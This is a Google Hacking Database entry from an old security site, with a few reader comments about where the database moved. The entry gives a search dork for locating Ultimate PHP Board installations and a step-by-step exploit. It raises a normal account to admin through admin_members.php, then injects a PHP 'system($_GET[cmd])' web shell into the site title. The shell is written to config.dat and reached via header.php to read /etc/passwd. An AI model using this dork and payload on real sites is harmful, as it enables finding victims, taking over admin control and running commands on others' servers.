GHDB « Hackers For Charity

GHDB

GHDB

Google Search: “Powered by UPB” (b 1.0)|(1.0 final)|(Public Beta 1.0b)

rgod rates this entry 10 out of 10.
Submitted: 2005-11-25 00:00:00
Added by: rgod
Hits: 596
Score: 10

dork: “Powered by UPB” (b 1.0)|(1.0 final)|(Public Beta 1.0b) this is a very old vulnerability discovered by Xanthic, can’t find it in GHDB and I am surprised of how it still works… register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and… boom! You see Admin Panel link as I see it? The only link to the advisory that I found is this (in Italian): http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it and I have remote commads xctn for this now, edit site title with this code: Ultimate PHP Board”; error_reporting(0); ini_set(“max_execution_time”,0); system($_GET[cmd]); echo ” now in config.dat we have: … $title=”Ultimate PHP Board “; error_reporting(0); ini_set(“max_execution_time”,0); system($_GET[cmd]); echo ” “; … in header.php we have: … include “./db/config.dat”; … so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd

Comments:


5 Responses to “GHDB”

  1. Jack says:
    October 26, 2011 at 9:12 pm

    Does GHDB still updates for now?

  2. Johnny says:
    October 27, 2011 at 3:31 am

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:
    April 20, 2013 at 7:10 am

    Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???

  4. Johnny says:
    April 27, 2013 at 5:10 am

    The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:
    May 7, 2013 at 7:38 am

    Is any offline view-able resources is available of this product ?

Leave a Reply